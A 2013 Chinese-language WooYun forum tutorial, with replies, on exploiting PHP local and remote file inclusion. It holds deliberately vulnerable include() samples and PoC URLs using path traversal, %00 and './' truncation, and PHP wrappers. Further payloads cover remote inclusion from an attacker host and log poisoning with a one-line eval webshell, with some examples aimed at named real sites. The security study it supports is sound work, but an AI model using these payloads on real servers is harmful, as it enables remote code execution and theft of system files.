当前位置:WooYun(白帽子技术社区) >> php >> php包含那点事情

php包含那点事情

_Evil (科普是一种公益行为) | 2013-01-03 15:48

有空就多整理下曾经研究过的知识和需要温顾的知识,明年可能去寻工作络.


关于PHP中LFI(Local File Include,本地文件包含)漏洞,大家都很熟悉了;paper很多很多,特别是国外的...不过

大家都懒得测试,我就来整理下.

1.普通本地包含;

<?php
$query=$_GET['p'];

include($query);
?>


poc:http://127.0.0.1:8080/phpwite/include.php?p=../hanguo/test.php

../hanguo/test.php为包含的路径.

baohan1.jpg

只要目标服务器支持上传,不管是jpg,txt,gif等都可以,在其中包含一句话木马即可,这种方法很简单没什么可说的。

2.截断本地包含
require_once($a.'.php');


include($a.".php");

等等类似此包含的函数..


WINDOWS下还有特别用处:

\.或者./或者\或者/截断 (WINDOWS都可以使用.)

[link href="WooYun: 快乐购某分站文件包含漏洞"]波波虎[/link]


截断的原理


[link href="WooYun: 济南大学主站本地文件包含导致代码执行"]Linux包含截断例子[/link] (Linux .//可以.)

%00截断包含,有gpc=off和php版本限制

poc:http://127.0.0.1:8080/phpwite/include.php?p=../hanguo/test.php%00


3.远程包含

allow_url_include=On就是远程文件包含了,为off那就只能本地包含了.

测试case:
<?php
$query=$_GET['p'];

include($query.".php");
?>


连接:http://www.xsser.com/explame.php?p=http://www.axxer.com/yeah.txt

爆错了:

Warning: main(http://www.axxer.com/yeah.txt.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in

/var/www/htdocs/explame.php on line 3


include($query.".php");代码的缘故,在后面加上了".php",导致yeah.txt变成了yeah.txt.php.

这里我们不需要截断啦,来个360计之----将计就计.

在www.axxer.com创建个yeah.php文件;

然后http://www.xsser.com/explame.php?p=http://www.axxer.com/yeah,自动在后面加

.php;多么爱。。。。


远程包含小连接

我们还可以用php自带协议来利用:

包含data:// 或者php://input 伪协议

这个漏洞对于php5.0以下有效,5.3测试失败,其他大家自行总结。还是比较鸡肋,不过不亏为一种好思路。

http://www.schnelltest24.de/index.php?page=/etc/passwd//这个没有截断,我们尝试下用协议看看.

baohan2.jpg

利用协议然后POST发送利用代码,哈哈;多么有爱~~~~.

4.日记包含高级利用

[link href="WooYun: 济南大学主站本地文件包含导致代码执行"]Linux包含截断例子[/link]

此连接已经透露出技巧了呢,连接思路简单说下:

(1)访问带有一句话的错误连接(http://www.ujn.edu.cn/<%3fphp eval($_REQUEST[s]);%3f>xxxxxxxx...),此连接将记录到error.log错误记录文件中.


(2)找到包含漏洞的地方,包含到error.log文件的路径.然后在自定义s参数中输入我们恶意代码. (http://www.ujn.edu.cn/english/depart.php?s=phpinfo();&name=../../../../../../var/log/lighttpd/error.log/././..........)


一先限制以及突破:
类似http://www.exp.com/index<?php eval($_POST[cmd]);?>.php
这样的提交,某些WEB服务器将会把空格做HTTP编码转成%20写入web日志,如果PHP包含<?php%20eval($_POST[cmd]);?>这样的语句肯定是不会成功的,所以我们必须把空格真正的写入WEB日志.

可以使用:伪造没有Connection HTTP标头的请求包

一点连接:内容1

内容2


5.其他高级利用

(1)包含/proc/self/environ环境变量:
这个是利用Linux中的环境变量作为基础,很多时候这个方法行不通,因为没有/proc/self/environ的访问权限.同读取/etc/passwd一样



利用(文章中第四点有详细介绍了.)

(2) phpinfo临时文件爆破包含. //看情况而定,有的需要%00等特殊字符截断.上面介绍过了.

(3)_SESSION爆破包含.   //看情况而定,有的需要%00等特殊字符截断.上面介绍过了.

(2) (3)点介绍

phpinfo爆破包含pdf

分享到:
17 个回复
  1. 1#
    回复此人 感谢
    梧桐雨 (‮ofni.uygnotuw‮) | 2013-01-03 15:50

    收下了

  2. 2#
    回复此人 感谢
    _Evil (科普是一种公益行为) | 2013-01-03 16:20

    @冷冷的夜 你在干啥。

  3. 3#
    回复此人 感谢
    鬼哥 | 2013-01-03 21:37

    \.或者./或者\或者/截断 (WINDOWS都可以使用.)

    用这个我反正没成功过。本地测试也不成功!

  4. 4#
    回复此人 感谢
    xsser (十根阳具有长短!!) | 2013-01-03 22:21

    @_Evil @晴天小铸 很努力啊  :)

  5. 5#
    回复此人 感谢
    三叔 (fuck) | 2013-01-03 22:28

    可以做后门用。。

  6. 6#
    回复此人 感谢
    _Evil (科普是一种公益行为) | 2013-01-03 22:59

    @鬼哥   我成功了 windows xp   appserv

  7. 7#
    回复此人 感谢
    _Evil (科普是一种公益行为) | 2013-01-03 23:00

    @xsser  解封我旧马甲

  8. 8# 感谢(1)
    回复此人 感谢
    /fd (Http://prompt.ml) | 2013-01-03 23:54

    補充:PHP Version >=5.3.4, >=5.2.15 的 NULL byte poisoning已被fixed,加上gpc及各種過濾,基本上已死
    RFI(远程包含)的後綴可以用?當成query string 來truncate
    更多的Path Truncation: FreeBSDFuzz1、Fuzz2 href="http://www.ush.it/2009/07/26/php-filesystem-attack-vectors-take-two/"]Fuzz2[/link]、點號截斷Linux
    PHP的伪协议又叫Wrapper:http://php.net/manual/en/wrappers.php,當中以php stream最為常用,例如在readfile而不是include等場景可以透過php://filter/read=convert.base64-encode/resource= 讀取base64後的文件;
    又例如php://fd 的利用:http://zone.wooyun.org/content/230 (PHP Version >=5.3.6 and <= 5.4.3, 5.3.13)
    要留意部分wrapper需要特定條件

    最後在Windows中包含临时文件可以嘗試大量上傳並遍曆tmp目錄,檔案名最长4个随机字符如php1A.tmp

  9. 9#
    回复此人 感谢
    GaRY | 2013-01-04 10:03

    @/fd 唉,早知道留点tricks,基本被php官方补的差不多了.尤其那个FD的

  10. 10#
    回复此人 感谢
    /fd (Http://prompt.ml) | 2013-01-04 10:13

    @GaRY 也不能說留不留,總會有其他人發現的

  11. 11#
    回复此人 感谢
    _Evil (科普是一种公益行为) | 2013-01-04 13:05

    楼上和楼楼上是高手

  12. 12#
    回复此人 感谢
    txcbg | 2013-01-04 17:13

    总结的不错啊,收藏了。

  13. 13#
    回复此人 感谢
    Clar | 2013-01-05 09:13

    收下,谢谢

  14. 14#
    回复此人 感谢
    HRay (018) | 2013-05-09 16:53

    php远程文件包含同样可以截断的,没必要重新弄个php文件,一般都是包含txt,截断就是file=http://www.xx.com/test.txt?
    用txt的原因是如果你的服务器解析php的话就不行了,test.txt?.php的话php会当做参数,文件则还是test.txt

  15. 15#
    回复此人 感谢
    _Evil (科普是一种公益行为) | 2013-05-09 17:56

    @HRay 小失误 早知道了  可惜不能编辑蛋碎一地

  16. 16# 感谢(1)
    回复此人 感谢
    GaRY | 2013-05-09 22:03

    有人挖了这个帖子,我再补充几点说明:

    1、linux利用./ \\之类去做截断,貌似已经失效。
    2、data:// php://input之类的包含,受到allow_url_include的限制。wrapper本身这个协议不受限制,但是也只能本地,不能用url绕过。因为读取同样底层是用stream类函数,也受到限制的。
    3、/proc/self/environ包含,只能对于apache+mod_php起作用(cgi貌似也可以,忘了),fcgi之类的不起作用,服务器变量不是通过env传递的。
    4、php://fd这个,php最新的版本已经无法利用了。这个已经改为只能通过cli运行php的时候才可以访问php://fd。

  17. 17#
    回复此人 感谢
    Mody | 2014-04-12 01:20

    @_Evil @鬼哥 我也没成功过,win2003+php5.2.10+iis6+fascgi,跪求成功的给个成功的具体的实验环境。。。

  18. 18#
    回复此人 感谢
    小贱人 (资深菜鸟) | 2014-05-04 16:02

    mark

  19. 19#
    回复此人 感谢
    龙翔 | 2014-05-09 14:52

    学习了

  20. 20#
    回复此人 感谢
    Azui | 2014-05-27 23:30

    很受益。

  21. 21#
    回复此人 感谢
    | 2014-05-28 00:50

    @_Evil @鬼哥 用./ / 啥的截断都没成功过,求实例~~~

  22. 22#
    回复此人 感谢
    | 2014-05-28 01:21

    @Mody ./   / 两种方式测试着都截断不了,但win下/. 和\.都是可以截断的,linux下还没有测试~~~

  23. 23#
    回复此人 感谢
    Mody | 2014-05-28 08:40

    @ linux下我后来有测试成功,详见http://mdxjj.sinaapp.com/?p=154

  24. 24#
    回复此人 感谢
    luwikes (土豆你个西红柿,番茄你个马铃薯~~~) | 2014-10-20 09:56

    挖一坟

  25. 25#
    回复此人 感谢
    迦南 (我不是玩黑,我就是认真) | 2014-10-25 17:31

    好东西。。。。

  26. 26#
    回复此人 感谢
    heh3 | 2014-12-05 10:33

    good JOB.

  27. 27#
    回复此人 感谢
    _Evil (科普是一种公益行为) | 2015-04-10 00:30

    @鬼哥 @梧桐雨 @xsser @/fd @GaRY @Mody 今天遇到一个截断问题,继续挖了各种帖子然后测试

    找到老外一篇paper 是作者09年时候的做的一个分析,不过php版本太低了 5.2的....

    URL:http://www.ush.it/2009/02/08/php-filesystem-attack-vectors/

    tuck tips:
    At a certain lenght (2019 on our test system) it should start printing numbers inside square brackets, that means that /etc/passwd has been succesfully included.

    - Windows path truncation POC

    On Windows the universal path truncation token is "./" and not "/.".

    <?php
    include('file.est'.str_repeat("./",4096).'.php');
    include('/file.est'.str_repeat("./",4096).'.php');
    include('localnonexistent/../../../../../file.est'.str_repeat("./",4096).'.php');
    include('localexistent/../../../../.././file.est'.str_repeat("./",4096).'.php');
    include('/wamp/../../../../.././file.est'.str_repeat("./",4096).'.php');
    ?>

    This means that "file.est./././[OMIT]./.php" will work, while the already seen "file.est/././[OMIT]././.php" will not. Please keep this in mind when working with Windows machines.

    The tokenizer is defined as follows:

    TSRM/tsrm_virtual_cwd.c-82:#define TOKENIZER_STRING "/\\"

    Another payload that works for the truncation attack is ".\" but we weren't able to find something equivalent to the "/etc/passwd/." on Unix. Feel curious and want to spend more time on the issue? (-;

    <?php
    include('file.ext'.str_repeat(".\\",4096).'.php');
    include('/file.ext'.str_repeat(".\\",4096).'.php');
    include('localnonexistent/../../../../../file.ext'.str_repeat(".\\",4096).'.php');
    include('localexistent/../../../../.././file.ext'.str_repeat(".\\",4096).'.php');
    include('/wamp/../../../../.././file.ext'.str_repeat(".\\",4096).'.php');
    ?>

  28. 28#
    回复此人 感谢
    社长 | 2015-06-08 15:22

    @_Evil 弱弱的说一点,其实4096只是个概念,这和存储模式有关,window下255的话,也单单指的是你使用ntfs存储,因为ascii嘛,liunx也是ntfs,不过是unicode。说着自己也晕了,以前看的page,不过这个点测试了好几次,就一次成功。。 小菜说说罢了

添加新回复

登录 后才能参与评论.

WooYun(白帽子技术社区)

网络安全资讯、讨论,跨站师,渗透师,结界师聚集之地

登录

其它内容


Copyright © 2010 www.wooyun.org All Rights Reserved. 吉ICP备12001400号-1